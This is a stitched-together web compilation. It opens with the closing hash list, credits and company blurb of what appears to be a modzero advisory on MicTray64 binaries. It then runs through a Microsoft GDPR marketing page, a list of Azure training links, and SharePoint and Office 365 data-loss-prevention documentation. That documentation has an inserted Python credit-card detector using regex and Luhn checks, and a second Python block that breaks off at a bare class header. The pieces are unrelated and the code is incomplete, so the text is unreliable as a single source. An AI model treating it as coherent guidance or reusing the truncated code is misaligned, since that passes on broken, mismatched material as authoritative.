127163c863b320814b6f420390db9d5ce48e9158bdb62aa94e953d85ec1e7a89 *MicTray64_v31.exe
7245f89fa00ea5fe5b290758a99288188d58cdaf2f4192ce469a5f4d256eaae0 *MicTray64_v31.i64 (IDA Pro DB by April 29, 2017)
ba1bc46ae6a4a6ecca08028022163e6bba291c330b057c6235c33a7519e617b7 *MicTray64_v31.xml
c046c7f364b42388bb392874129da555d9c688dced3ac1d6a1c6b01df29ea7a8 *MicTray64_v46.exe
4563a0e4e85edeb7ddeba57d1cb8e4a30f1b5ee9fb128725a2664de2aa8c17ec *MicTray64_v46.i64 (IDA Pro DB by April 29, 2017)
ba1bc46ae6a4a6ecca08028022163e6bba291c330b057c6235c33a7519e617b7 *MicTray64_v46.xml

---------------------------------------------------------------------
9. Credits
---------------------------------------------------------------------

* Thorsten Schroeder

---------------------------------------------------------------------
10. About modzero
---------------------------------------------------------------------

The independent Swiss company modzero AG assists clients with
security analysis in the complex areas of computer technology. The
focus lies on highly detailed technical analysis of concepts,
software and hardware components as well as the development of
individual solutions. Colleagues at modzero AG work exclusively in
practical, highly technical computer-security areas and can draw on
decades of experience in various platforms, system concepts, and
designs.

https://www.modzero.ch
contact@modzero.ch

The General Data Protection Regulation (GDPR) for Office 365

In May 2018, a European privacy law is due to take effect that will require big changes, and potentially significant investments, by organizations all over the world—including Microsoft and our customers.

Known as the General Data Protection Regulation (GDPR), the law imposes new rules on companies, government agencies, non-profits, and other organizations that offer goods and services to people in the European Union (EU), or that collect and analyze data tied to EU residents. The GDPR applies no matter where you are located.

Microsoft believes the GDPR represents an important step forward for individual privacy rights. It gives EU residents more control over their “personal data” (which is precisely defined by the GDPR). The GDPR also seeks to ensure personal data is protected no matter where it is sent, processed, or stored. The law updates European privacy regulations for the first time in more than two decades, bringing them more in line with current technologies, and increases the uniformity of privacy regulations across the EU’s member states.

The GDPR is also a complex regulation that may require vast changes in how you gather and manage data. Microsoft has a long history of helping our customers comply with complex regulations. When it comes to preparing for the GDPR, we’ve got your back.

Supporting your journey to compliance with the GDPR

We want to help you focus on your core business while efficiently preparing for the GDPR. Our goal is to streamline your compliance with the GDPR through smart technology, innovation, and collaboration.

Microsoft products and services are available today to help you meet the GDPR requirements, and we are investing in additional features and functionality. Through our cloud services and on-premises solutions we’ll help you locate and catalog the personal data in your systems, build a more secure environment, simplify your management and monitoring of personal data, and give you the tools and resources you need to meet the GDPR reporting and assessment requirements.

We will share what we learn on our journey to compliance to make yours easier. We will show you how our existing enterprise products and services—such as Azure, Dynamics 365, Enterprise Mobility + Security, Office 365, SQL Server and Azure SQL Database, and Windows 10—can jumpstart that journey today.

Where do I start?

The GDPR contains many requirements about how you collect, store and use personal information. This means not only how you identify and secure the personal data in your systems, but also how you accommodate new transparency requirements, how you detect and report personal data breaches, and how you train privacy personnel and employees.

Given how much is involved, you should not wait until the regulation takes effect in May 2018 to prepare. You need to begin reviewing your privacy and data management practices now. Failure to comply with the GDPR could prove costly, as companies that do not meet the requirements and obligations could face substantial fines and reputational harm.

We recommend you begin your journey to compliance with the GDPR by focusing on four key steps:

  • Discover: Identify what personal data you have and where it resides.
  • Manage: Govern how personal data is used and accessed.
  • Protect: Establish security controls to prevent, detect, and respond to vulnerabilities and data breaches.
  • Report: Keep required documentation, and continuously review and update your data protection policies and practices.

Microsoft products and services provide powerful solutions to tackle these steps in your journey to compliance with the GDPR.

To learn more about how Microsoft products and services can help you prepare to comply with the GDPR, please see the sections on Azure, Dynamics 365, Enterprise Mobility + Security, Office 365, SQL Server/Azure SQL Database, and Windows 10.

Microsoft’s commitment to the GDPR

The goals of the GDPR are consistent with Microsoft’s long-standing commitment to security, privacy, and transparency.

We are working to bring our products and services into compliance with the GDPR by May 2018. We are updating the features and functionality in all of our services to meet the GDPR requirements, and we are updating our documentation and our customer agreements to reflect the GDPR requirements.

Microsoft offers the most comprehensive set of compliance capabilities of any cloud service provider. And, we lead the industry in engaging with customers, regulatory bodies, and standards boards to advance compliance and serve customers’ needs. We will remain closely engaged with you as we prepare together for the GDPR to go into effect.

Microsoft designed Office and Office 365 with industry-leading security measures and privacy policies to safeguard your data in the cloud, including the categories of personal data identified by the GDPR. Office and Office 365 can help you on your journey to reducing risks and achieving compliance with the GDPR.

One essential step to meeting the GDPR obligations is discovering and controlling what personal data you hold and where it resides. There are a number of Office 365 solutions that can help you identify or manage access to personal data:

  • Data Loss Prevention (DLP) in Office and Office 365 can identify over 80 common sensitive data types including financial, medical, and personally identifiable information. In addition, DLP allows organizations to configure actions to be taken upon identification to protect sensitive information and prevent its accidental disclosure.
  • Advanced Data Governance uses intelligence and machine-assisted insights to help you find, classify, set policies on, and take action to manage the lifecycle of the data that is most important to your organization.
  • Office 365 eDiscovery search can be used to find text and metadata in content across your Office 365 assets—SharePoint Online, OneDrive for Business, Skype for Business Online, and Exchange Online. In addition, powered by machine learning technologies, Office 365 Advanced eDiscovery can help you identify documents that are relevant to a particular subject (for example, a compliance investigation) quickly and with better precision than traditional keyword searches or manual reviews of vast quantities of documents.
  • Customer Lockbox for Office 365 can help you meet compliance obligations for explicit data access authorization during service operations. When a Microsoft service engineer needs access to your data, access control is extended to you so that you can grant final approval for access. Actions taken are logged and accessible to you so that they can be audited.

Another core requirement of the GDPR is protecting personal data against security threats. Current Office 365 features that safeguard data and identify when a data breach occurs include:

  • Advanced Threat Protection in Exchange Online Protection helps protect your email against new, sophisticated malware attacks in real time. It also allows you to create policies that help prevent your users from accessing malicious attachments or malicious websites linked through email.
  • Threat Intelligence helps you proactively uncover and protect against advanced threats in Office 365. Deep insights into threats—provided by Microsoft’s global presence, the Intelligent Security Graph, and input from cyber threat hunters—help you quickly and effectively enable alerts, dynamic policies, and security solutions.
  • Advanced Security Management enables you to identify high-risk and abnormal usage, alerting you to potential breaches. In addition, it allows you to set up activity policies to track and respond to high risk actions.
  • Finally, Office 365 audit logs allow you to monitor and track user and administrator activities across workloads in Office 365, which help with early detection and investigation of security and compliance issues.

For more information please visit our Office 365 Trust Center.

To learn more about how Microsoft products and services can help you prepare to comply with the GDPR, please see the sections on Azure, Dynamics 365, Enterprise Mobility + Security, SQL Server/Azure SQL Database, and Windows 10.

For more detail visit the Microsoft Trust Center.

Cloud with Azure 101

Hi,

In this article I would like to share the learning options and how you can get Microsoft Azure cloud training.

Office 365 IT Pro Training https://mva.microsoft.com/en-US/training-courses/support-corner-accessing-azure-ad-portal-from-office-365-10634

Option 1: Microsoft Azure Free Training

Free Training: https://azure.microsoft.com/en-in/community/training/

Azure VMs Getting Started: https://azure.microsoft.com/en-us/community/training/courses/azure-vms-getting-started/

Azure Infrastructure Getting Started: https://azure.microsoft.com/en-us/community/training/courses/managing-infrastructure-microsoft-azure-getting-started/

Managing and Monitoring: https://www.pluralsight.com/courses/azure-iaas-monitoring-management-getting-started?twoid=54b2915b-fe06-488f-9d5d-c8a892d950eb

Microsoft Virtual Academy a free learning platform

Azure Fundamentals: https://mva.microsoft.com/en-US/training-courses/microsoft-azure-fundamentals-8391

Azure AD: https://mva.microsoft.com/en-US/training-courses/microsoft-azure-for-it-pros-content-series-azure-active-directory-16754

https://mva.microsoft.com/en-US/training-courses/azure-active-directory-core-skills-jump-start-8736

Azure Security Center: https://mva.microsoft.com/en-US/training-courses/introduction-to-azure-security-center-16614

https://mva.microsoft.com/en-US/training-courses/automating-the-cloud-with-azure-automation-8323

https://mva.microsoft.com/en-US/training-courses/deploying-linux-vms-on-microsoft-azure-8451

https://mva.microsoft.com/en-US/training-courses/azure-networking-fundamentals-for-it-pros-8917

https://mva.microsoft.com/en-US/training-courses/microsoft-azure-for-it-pros-content-series-storage-17237

Azure Infrastructure

https://mva.microsoft.com/en-US/training-courses/moving-to-hybrid-cloud-with-microsoft-azure-8372

https://mva.microsoft.com/en-US/training-courses/certification-exam-overview-70533-implementing-microsoft-azure-infrastructure-solutions-17405

https://mva.microsoft.com/en-US/training-courses/certification-exam-overview-70532-developing-microsoft-azure-solutions-17404

https://mva.microsoft.com/en-US/training-courses/certification-exam-overview-70534-architecting-microsoft-azure-solutions-17406

https://mva.microsoft.com/en-US/training-courses/microsoft-azure-for-it-pros-content-series-virtual-networking-16753

https://mva.microsoft.com/en-US/training-courses/building-microservices-applications-on-azure-service-fabric-16747

https://mva.microsoft.com/en-US/training-courses/microsoft-azure-iaas-deep-dive-jump-start-8287

https://mva.microsoft.com/en-US/training-courses/microsoft-azure-machine-learning-jump-start-8425

https://mva.microsoft.com/en-US/training-courses/microsoft-azure-for-it-pros-content-series-virtual-machines-16752

https://mva.microsoft.com/en-US/training-courses/microsoft-azure-for-it-pros-content-series-paas-cloud-services-17332

https://mva.microsoft.com/en-US/training-courses/microsoft-azure-for-it-pros-content-series-management-security-17254

https://mva.microsoft.com/en-US/training-courses/getting-started-with-azure-security-for-the-it-professional-11165


DLP in SharePoint an Overview

To comply with business standards and industry regulations, organizations need to protect sensitive information and prevent its inadvertent disclosure. Examples of sensitive information that you might want to prevent from leaking outside your organization include financial data or personally identifiable information (PII) such as credit card numbers, social security numbers, or national ID numbers. With a data loss prevention (DLP) policy in SharePoint Server 2016, you can identify, monitor, and automatically protect sensitive information across your site collections.

With DLP, you can:

  • Create a DLP query to identify what sensitive information now exists in your site collections. Before you create DLP policies, it’s often helpful to see what types of sensitive information people in your organization are working with, and which site collections contain this sensitive information. With a DLP query, you can find sensitive information that’s subject to common industry regulations, better understand your risks, and determine what and where is the sensitive information that your DLP policies need to protect.
  • Create a DLP policy to monitor and automatically protect sensitive information in your site collections. For example, you can set up a policy that displays a policy tip to users if they save documents that contain personally identifiable information. Further, the policy can automatically block access to those documents for everyone but the site owner, content owner, and whoever last modified the document. And lastly, because you don’t want your DLP policies to prevent people from getting their work done, the policy tip has an option to override the blocking action, so that people can continue to work with documents if they have a business justification.

DLP templates

When you create a DLP query or a DLP policy, you can choose from a list of DLP templates that correspond to common regulatory requirements. Each DLP template identifies specific types of sensitive information – for example, the template named U.S. Personally Identifiable Information (PII) Data identifies content that contains U.S. and U.K. passport numbers, U.S. Individual Taxpayer Identification Numbers (ITIN), or U.S. Social Security Numbers (SSN).

DLP policy templates

Sensitive information types

A DLP policy helps protect sensitive information, which is defined as a sensitive information type. SharePoint Server 2016 includes definitions for many common sensitive information types that are ready for you to use, such as a credit card number, bank account numbers, national ID numbers, and passport numbers.

When a DLP policy looks for a sensitive information type such as a credit card number, it does not simply look for a 16-digit number. Each sensitive information type is defined and detected by using a combination of:

  • Keywords
  • Internal functions to validate checksums or composition
  • Evaluation of regular expressions to find pattern matches
  • Other content examination

This helps DLP detection achieve a high degree of accuracy while reducing the number of false positives that can interrupt peoples’ work.
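The bullets above describe detection as a combination of evidence rather than a single pattern. Here is an added Python illustration of that idea for the Credit Card Number type (not Microsoft's implementation; the regex, keyword list and sample document are constructed for this example): a regular expression finds candidates, a Luhn checksum function rejects numbers that merely look like cards, and keywords on the same line grade confidence.

```python
import re

# Candidate pattern: 13 to 19 digits, optionally separated by single spaces or
# dashes, not embedded in a longer digit run. Constructed for this example; the
# patterns SharePoint actually uses are not published on this page.
CARD_CANDIDATE = re.compile(r"(?<![\d-])(?:\d[ -]?){12,18}\d(?![\d-])")

# Keywords that raise confidence when they appear on the same line as a
# candidate (assumed list, not the product's own keyword dictionary).
CARD_KEYWORDS = ("credit card", "card number", "card on file", "visa", "mastercard", "amex")

# Constructed sample document: two well-known test numbers that pass the Luhn
# check, plus two 13-16 digit values (an order reference and a ticket number)
# that a plain regex would flag but the checksum rejects.
SAMPLE_DOC = """Customer card on file: Visa 4111 1111 1111 1111, exp 12/27.
Backup payment method 5500-0000-0000-0004 (no label).
Order reference 1234567890123 and ticket 4111111111111112 are not cards.
"""


def luhn_valid(digits: str) -> bool:
    """Luhn checksum: the 'internal function to validate checksums' step."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def line_containing(text: str, start: int, end: int) -> str:
    """Return the line of `text` that spans offsets start..end (keyword context)."""
    line_start = text.rfind("\n", 0, start) + 1
    line_end = text.find("\n", end)
    return text[line_start:line_end if line_end != -1 else len(text)]


def find_credit_card_numbers(text: str) -> list:
    """Combine regex, checksum and keyword evidence as the bullets above describe."""
    found = []
    for m in CARD_CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if not luhn_valid(digits):
            continue                              # regex hit, but not a card number
        context = line_containing(text, m.start(), m.end()).lower()
        keyword_hit = any(k in context for k in CARD_KEYWORDS)
        found.append({
            "value": m.group(),
            "offset": m.start(),
            "confidence": "high" if keyword_hit else "medium",
        })
    return found


def credit_card_count(text: str) -> int:
    """Instance count that a DLP rule compares against its min/max thresholds."""
    return len(find_credit_card_numbers(text))


if __name__ == "__main__":
    for hit in find_credit_card_numbers(SAMPLE_DOC):
        print(hit)
    print("instances:", credit_card_count(SAMPLE_DOC))
```

Only the two checksum-valid numbers are reported; the order reference and ticket number are regex hits that the Luhn check discards, which is the false-positive reduction the paragraph refers to.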

Each DLP template looks for one or more types of sensitive information. For more information on how each sensitive information type works, see What the sensitive information types in SharePoint Server 2016 look for.

This DLP template… Looks for these sensitive information types…

U.S. Personally Identifiable Information (PII) Data
  • U.S. / U.K. Passport Number
  • U.S. Individual Taxpayer Identification Number (ITIN)
  • U.S. Social Security Number (SSN)

U.S. Gramm-Leach-Bliley Act (GLBA)
  • Credit Card Number
  • U.S. Bank Account Number
  • U.S. Individual Taxpayer Identification Number (ITIN)
  • U.S. Social Security Number (SSN)

PCI Data Security Standard (PCI DSS)
  • Credit Card Number

U.K. Financial Data
  • Credit Card Number
  • EU Debit Card Number
  • SWIFT Code

U.S. Financial Data
  • ABA Routing Number
  • Credit Card Number
  • U.S. Bank Account Number

U.K. Personally Identifiable Information (PII) Data
  • U.K. National Insurance Number (NINO)
  • U.S. / U.K. Passport Number

U.K. Data Protection Act
  • SWIFT Code
  • U.K. National Insurance Number (NINO)
  • U.S. / U.K. Passport Number

U.K. Privacy and Electronic Communications Regulations
  • SWIFT Code

U.S. State Social Security Number Confidentiality Laws
  • U.S. Social Security Number (SSN)

U.S. State Breach Notification Laws
  • Credit Card Number
  • U.S. Bank Account Number
  • U.S. Driver’s License Number
  • U.S. Social Security Number (SSN)

DLP queries

Before you create your DLP policies, you might want to see what sensitive information already exists across your site collections. To do this, you create and run DLP queries in the eDiscovery Center.

Create DLP Query button

A DLP query works the same as an eDiscovery query. Based on which DLP template you choose, the DLP query is configured to search for specific types of sensitive information. First choose the locations you want to search, and then you can fine-tune the query because it supports Keyword Query Language (KQL). In addition, you can narrow down the query by selecting a date range, specific authors, SharePoint property values, or locations. And just like an eDiscovery query, you can preview, export, and download the query results.

DLP query containing sensitive information types

DLP policies

A DLP policy helps you identify, monitor, and automatically protect sensitive information that’s subject to common industry regulations. You choose what types of sensitive information to protect, and what actions to take when content containing such sensitive information is detected. A DLP policy can notify the compliance officer by sending an incident report, notify the user with a policy tip on the site, and optionally block access to the document for everyone but the site owner, content owner, and whoever last modified the document. Finally, the policy tip has an option to override the blocking action, so that people can continue to work with documents if they have a business justification or need to report a false positive.

You create and manage DLP policies in the Compliance Policy Center. Creating a DLP policy is a two-step process: first you create the DLP policy, and then you assign the policy to a site collection.

Compliance Policy Center

Step 1: Creating a DLP policy

When you create a DLP policy, you choose a DLP template that looks for the types of sensitive information that you need to identify, monitor, and automatically protect.

New DLP Policy page

When a DLP policy finds content that includes the minimum number of instances of a specific type of sensitive information that you choose – for example, five credit card numbers, or a single social security number – then the DLP policy can automatically protect the sensitive information by taking the following actions:

  • Sending an incident report to the people you choose (such as your compliance officer) with details of the event. This report includes details about the detected content such as the title, document owner, and what sensitive information was detected. To send incident reports, you need to configure outgoing e-mail settings in Central Administration.
  • Notifying the user with a policy tip when documents that contain sensitive information are saved or edited. The policy tip explains why that document conflicts with a DLP policy, so that people can take remedial action, such as removing the sensitive information from the document. When the document is in compliance, the policy tip disappears.
  • Blocking access to the content for everyone except the site owner, document owner, and person who last modified the document. These people can remove the sensitive information from the document or take other remedial action. When the document is in compliance, the original permissions will be automatically restored. It’s important to understand that the policy tip gives people the option to override the blocking action. Policy tips can thus help educate users about your DLP policies and enforce them without preventing people from doing their work.

    Policy tip showing blocked access to document

Step 2: Assigning a DLP policy

After you create a DLP policy, you need to assign it to one or more site collections, where it can begin to help protect sensitive information in those locations. A single policy can be assigned to many site collections, but each assignment needs to be created one at a time.

Policy assignments for site collections

Policy tips

You want people in your organization who work with sensitive information to stay compliant with your DLP policies, but you don’t want to block them unnecessarily from getting their work done. This is where policy tips can help.

A policy tip is a notification or warning that appears when someone is working with content that conflicts with a DLP policy — for example, content like an Excel workbook that contains personally identifiable information (PII) and that’s saved to a site.

You can use policy tips to increase awareness and help educate people about your organization’s policies. Policy tips also give people the option to override the policy, so that they’re not blocked if they have a valid business need or if the policy is detecting a false positive.

Viewing or overriding a policy tip

To take action on a document, such as overriding the DLP policy or reporting a false positive, you can select the Open … menu for the item > View policy tip.

The policy tip lists the issues with the content, and you can choose Resolve, and then Override the policy tip or Report a false positive.

Policy tip for a document Overriding a policy tip

Details about how policy tips work

Note that it’s possible for content to match more than one DLP policy, but only the policy tip from the most restrictive, highest-priority policy will be shown. For example, a policy tip from a DLP policy that blocks access to content will be shown over a policy tip from a rule that simply notifies the user. This prevents people from seeing a cascade of policy tips. Also, if the policy tips in the most restrictive policy allow people to override the policy, then overriding this policy also overrides any other policies that the content matched.

DLP policies are synced to sites and content is evaluated against them periodically and asynchronously (see the next section), so there may be a short delay between the time you create the DLP policy and the time you begin to see policy tips.

How DLP policies work

DLP detects sensitive information by using deep content analysis (not just a simple text scan). This deep content analysis uses keyword matches, the evaluation of regular expressions, internal functions, and other methods to detect content that matches your DLP policies. Potentially only a small percentage of your data is considered sensitive. A DLP policy can identify, monitor, and automatically protect just that data, without impeding or affecting people who work with the rest of your content.

After you create a DLP policy in the Compliance Policy Center, it’s stored as a policy definition in that site. Then, as you assign the policy to different site collections, the policy is synced to those locations, where it starts to evaluate content and enforce actions like sending incident reports, showing policy tips, and blocking access.

Policy evaluation in sites

Across all of your site collections, documents are constantly changing — they’re continually being created, edited, shared, and so on. This means documents can conflict or become compliant with a DLP policy at any time. For example, a person can upload a document that contains no sensitive information to their team site, but later, a different person can edit the same document and add sensitive information to it.

For this reason, DLP policies check documents for policy matches frequently in the background. You can think of this as asynchronous policy evaluation.

Here’s how it works. As people add or change documents in their sites, the search engine scans the content, so that you can search for it later. While this is happening, the content’s also scanned for sensitive information. Any sensitive information that’s found is stored securely in the search index, so that only the compliance team can access it, but not typical users. Each DLP policy that you’ve turned on runs in the background (asynchronously), checking search frequently for any content that matches a policy, and applying actions to protect it from inadvertent leaks.

Diagram showing how DLP policy evaluates content asynchronously

Finally, documents can conflict with a DLP policy, but they can also become compliant with a DLP policy. For example, if a person adds credit card numbers to a document, it might cause a DLP policy to block access to the document automatically. But if the person later removes the sensitive information, the action (in this case, blocking) is automatically undone the next time the document is evaluated against the policy.

DLP evaluates any content that can be indexed. For more information on what file types are crawled by default, see Default crawled file name extensions and parsed file types.

View DLP events in the usage logs

You can view DLP policy activity in the usage logs on the server running SharePoint Server 2016. For example, you can view the text entered by users when they override a policy tip or report a false positive.

First you need to turn on the option in Central Administration (Monitoring > Configure usage and health data collection > Simple Log Event Usage Data_SPUnifiedAuditEntry). For more information about usage logging, see Configure usage and health data collection.

Option to turn on DLP usage logs

After you turn on this feature, you can open the usage reports on the server and view the justifications provided by users for overriding a DLP policy tip, along with other DLP events.

Reason for user override in usage log

Before you get started with DLP

This topic outlines some of the features that DLP depends on. These include:

  • To detect and classify sensitive information in your site collections, start the search service and define a crawl schedule for your content.
  • Turn on outgoing email.
  • To view user overrides and other DLP events, turn on the usage report.
  • Create the site collections:
    • For DLP queries, create the eDiscovery Center site collection.
    • For DLP policies, create the Compliance Policy Center site collection.
  • Create a security group for your compliance team, and then add the security group to the Owners group in the eDiscovery Center or Compliance Policy Center.
  • To run DLP queries, view permissions are required for all content that the query will search – for more information, see Create a DLP query in SharePoint Server 2016.

More information

Data Loss Prevention (DLP) implementation in Office 365 – Part 2

What do the DLP policy templates include?

Data loss prevention (DLP) in the Office 365 Security & Compliance Center includes ready-to-use policy templates that address common compliance requirements, such as helping you to protect sensitive information subject to the U.S. Health Insurance Act (HIPAA), U.S. Gramm-Leach-Bliley Act (GLBA), or U.S. Patriot Act. This topic lists all of the policy templates, what types of sensitive information they look for, and what the default conditions and actions are. This topic does not include every detail of how each policy template is configured; instead, it presents you with enough information to help you decide which template is the best starting point for your scenario. Remember, you can customize these policy templates to meet your specific requirements.

PCI Data Security Standard (PCI DSS)

Rule name: PCI DSS: Scan content shared outside – low count
  Conditions (including sensitive information types):
  • Content contains sensitive information: Credit Card Number — Min count 1, Max count 9
  • Content is shared with: People outside my organization
  Actions:
  • Send a notification

Rule name: PCI DSS: Scan content shared outside – high count
  Conditions (including sensitive information types):
  • Content contains sensitive information: Credit Card Number — Min count 10, Max count any
  • Content is shared with: People outside my organization
  Actions:
  • Block access to content
  • Send a notification (Allow override; Require business justification)
  • Send incident report

For more details on what each DLP policy template includes, visit here.

View the reports for data loss prevention

After you create your data loss prevention (DLP) policies, you’ll want to verify that they’re working as you intended and helping you to stay compliant. With the DLP reports in Office 365, you can quickly view the number of DLP policy matches, overrides, or false positives; see whether they’re trending up or down over time; filter the report in different ways; and view additional details by selecting a point on a line on the graph.

You can use the DLP reports to:

  • Focus on specific time periods and understand the reasons for spikes and trends.
  • Discover business processes that violate your organization’s DLP policies.
  • Understand any business impact of the DLP policies.
  • View the justifications submitted by users when they resolve a policy tip by overriding the policy or reporting a false positive.
  • Verify compliance with a specific DLP policy by showing any matches for that policy.
  • View a list of files with sensitive data that matches your DLP policies in the details pane.

In addition, you can use the DLP reports to fine-tune your DLP policies as you run them in test mode.

DLP report showing policy matches

View the DLP reports

  1. Go to the Office 365 admin center.
  2. Navigate to Admin centers > Security & Compliance. You’re now in the Office 365 Security & Compliance Center.
  3. Navigate to Reports > View reports. Under Data loss prevention (DLP), go to either DLP policy and rule matches or DLP false positives and overrides.

    Reports page in the Office 365 Security & Compliance Center

  4. You can filter the reports by date, location, and policy or rule.

    DLP report showing options to filter

  5. If you choose the DLP policy and rule matches report, select a point on a line on the graph to view details about matches.

    The details pane appears below the graph. Here you can view:

    • The specific rule and action that matched the content.
    • The file name and path of content that matched the rule.
    • Who last modified the content.
    • What types and count of sensitive information were detected.

    Note: A match is logged only the first time a file matches a rule. But if you edit a rule in a DLP policy, a newer version of the rule is created, so another match will be logged if the file matches the new version of the rule.

    DLP report with details pane below the chart

  6. If you choose the DLP false positives and overrides report, select a point on a line on the graph to view details about overrides or false positives.

    The details pane appears below the graph. Here you can view:

    • The specific rule that matched the content.
    • The file name and path of content that matched the rule.
    • Who last modified the content.
    • What types and count of sensitive information were detected.
    • The justifications submitted by users when they resolved a policy tip.

    DLP false positives and overrides report showing user justification text

Find the cmdlets for the DLP reports

To use most of the cmdlets for the Security & Compliance Center, you need to:

  1. Connect to the Office 365 Security & Compliance Center using remote PowerShell
  2. Use any of these Office 365 Security & Compliance Center cmdlets

However, DLP reports need to pull data from across Office 365, including Exchange Online. For this reason, the cmdlets for the DLP reports are available in Exchange Online PowerShell, not in Security & Compliance Center PowerShell. Therefore, to use the cmdlets for the DLP reports, you need to:

  1. Connect to Exchange Online using remote PowerShell
  2. Use any of these cmdlets for the DLP reports:

Send email notifications and show policy tips for DLP policies

You can use a data loss prevention (DLP) policy to identify, monitor, and protect sensitive information across Office 365. You want people in your organization who work with this sensitive information to stay compliant with your DLP policies, but you don’t want to block them unnecessarily from getting their work done. This is where email notifications and policy tips can help.

Message bar shows policy tip in Excel 2016

A policy tip is a notification or warning that appears when someone is working with content that conflicts with a DLP policy—for example, content like an Excel workbook on a OneDrive for Business site that contains personally identifiable information (PII) and is shared with an external user.

You can use email notifications and policy tips to increase awareness and help educate people about your organization’s policies. You can also give people the option to override the policy, so that they’re not blocked if they have a valid business need or if the policy is detecting a false positive.

In the Office 365 Security & Compliance Center, when you create a DLP policy, you can configure the user notifications to:

  • Send an email notification to the people you choose that describes the issue.
  • Display a policy tip for content that conflicts with the DLP policy:
    • For email in Outlook on the web and Outlook 2013 and later, the policy tip appears at the top of a message above the recipients while the message is being composed.
    • For documents in a OneDrive for Business account or SharePoint Online site, the policy tip is indicated by a warning icon that appears on the item. To view more information, you can select an item and then choose Information (the information pane icon) in the upper-right corner of the page to open the details pane.
    • For Excel 2016, PowerPoint 2016, and Word 2016 documents that are stored on a OneDrive for Business site or SharePoint Online site that’s included in the DLP policy, the policy tip appears on the Message Bar and the Backstage view (File menu > Info).

Add user notifications to a DLP policy

When you create a DLP policy, both email notifications and policy tips are part of the User notifications section.

  1. Go to https://protection.office.com.
  2. Sign in to Office 365 using your work or school account. You’re now in the Office 365 Security & Compliance Center.
  3. In the Security & Compliance Center > left navigation > Data loss prevention > Policy > + Create a policy.

    Create a policy button

  4. Choose the DLP policy template that protects the types of sensitive information that you need > Next.

    To start with an empty template, choose Custom > Custom policy > Next.

  5. Name the policy > Next.
  6. To choose the locations that you want the DLP policy to protect, do one of the following:
    • Choose All locations in Office 365 > Next.
    • Choose Let me choose specific locations > Next.

      To include or exclude an entire location such as all Exchange email or all OneDrive accounts, switch the Status of that location on or off.

      To include only specific SharePoint sites or OneDrive accounts, switch the Status to on, and then click the links under Include to choose specific sites or accounts.

  7. Choose Use advanced settings > Next.
  8. Choose + New rule.
  9. In the rule editor, under User notifications, switch the status on.

    User notifications section of rule editor

Options for configuring email notifications

For each rule in a DLP policy, you can:

  • Send the notification to the people you choose. These people can include the owner of the content, the person who last modified the content, the owner of the site where the content is stored, or a specific user.
  • Customize the text that’s included in the notification by using HTML or tokens. See the section below for more information.

Notes:

  • Email notifications can be sent only to individual recipients—not groups or distribution lists.
  • Only new content will trigger an email notification. Editing existing content will trigger policy tips but not an email notification.

Email notification options

Default email notification

Notifications have a Subject line that begins with the action taken, such as “Notification”, “Message Blocked” for email, or “Access Blocked” for documents. If the notification is about a document, the notification message body includes a link that takes you to the site where the document’s stored and opens the policy tip for the document, where you can resolve any issues (see the section below about policy tips). If the notification is about a message, the notification includes as an attachment the message that matches a DLP policy.

Notification message

By default, notifications display text similar to the following for an item on a site. The notification text is configured separately for each rule, so the text that’s displayed differs depending on which rule is matched.

If the DLP policy rule does this… Then the default notification for SharePoint or OneDrive for Business documents says this… Then the default notification for Outlook messages says this…

Sends a notification but doesn’t allow override
  • Documents: This item conflicts with a policy in your organization.
  • Outlook messages: Your email message conflicts with a policy in your organization.

Blocks access, sends a notification, and allows override
  • Documents: This item conflicts with a policy in your organization. If you don’t resolve this conflict, access to this file might be blocked.
  • Outlook messages: Your email message conflicts with a policy in your organization. The message wasn’t delivered to all recipients.

Blocks access and sends a notification
  • Documents: This item conflicts with a policy in your organization. Access to this item is blocked for everyone except its owner, last modifier, and the primary site collection administrator.
  • Outlook messages: Your email message conflicts with a policy in your organization. The message wasn’t delivered to all recipients.

Custom email notification

You can create a custom email notification instead of sending the default email notification to your end users or admins. The custom email notification supports HTML and has a 5,000-character limit. You can use HTML to include images, formatting, and other branding in the notification.

You can also use the following tokens to help customize the email notification. These tokens are variables that are replaced by specific information in the notification that’s sent.

Token Description
%%AppliedActions%% The actions applied to the content.
%%ContentURL%% The URL of the document on the SharePoint Online site or OneDrive for Business site.
%%MatchedConditions%% The conditions that were matched by the content. Use this token to inform people of possible issues with the content.

Notification message showing where tokens appear

Options for configuring policy tips

For each rule in a DLP policy, you can configure policy tips to:

  • Simply notify the person that the content conflicts with a DLP policy, so that they can take action to resolve the conflict. You can use the default text (see the tables below) or enter custom text about your organization’s specific policies.
  • Allow the person to override the DLP policy. Optionally, you can:
    • Require the person to enter a business justification for overriding the policy. This information is logged and you can view it in the DLP reports in the Reports section of the Security & Compliance Center.
    • Allow the person to report a false positive and override the DLP policy. This information is also logged for reporting, so that you can use false positives to fine-tune your rules.

Policy tip options

For example, you may have a DLP policy applied to OneDrive for Business sites that detects personally identifiable information (PII), and this policy has three rules:

  1. First rule: If fewer than five instances of this sensitive information are detected in a document, and the document is shared with people inside the organization, the Send a notification action displays a policy tip. For policy tips, no override options are necessary because this rule is simply notifying people and not blocking access.
  2. Second rule: If greater than five instances of this sensitive information are detected in a document, and the document is shared with people inside the organization, the Block access to content action restricts the permissions for the file, and the Send a notification action allows people to override the actions in this rule by providing a business justification. Your organization’s business sometimes requires internal people to share PII data, and you don’t want your DLP policy to block this work.
  3. Third rule: If greater than five instances of this sensitive information are detected in a document, and the document is shared with people outside the organization, the Block access to content action restricts the permissions for the file, and the Send a notification action does not allow people to override the actions in this rule because the information is shared externally. Under no circumstances should people in your organization be allowed to share PII data outside the organization.

Here are some fine points to understand about using a policy tip to override a rule:

  • The option to override is per rule, and it overrides all of the actions in the rule (except sending a notification, which can’t be overridden).
  • It’s possible for content to match several rules in a DLP policy, but only the policy tip from the most restrictive, highest-priority rule will be shown. For example, a policy tip from a rule that blocks access to content will be shown over a policy tip from a rule that simply sends a notification. This prevents people from seeing a cascade of policy tips.
  • If the policy tips in the most restrictive rule allow people to override the rule, then overriding this rule also overrides any other rules that the content matched.
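To make the count thresholds, the sharing condition and the precedence fine points concrete, here is an added Python model of rule evaluation (not Microsoft's code). It encodes the two PCI DSS template rules listed earlier on this page plus one constructed notify-only rule that matches regardless of sharing, so that a single document can match several rules; the priority numbers, the selection order and the override bookkeeping are assumptions made for the example.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Rule:
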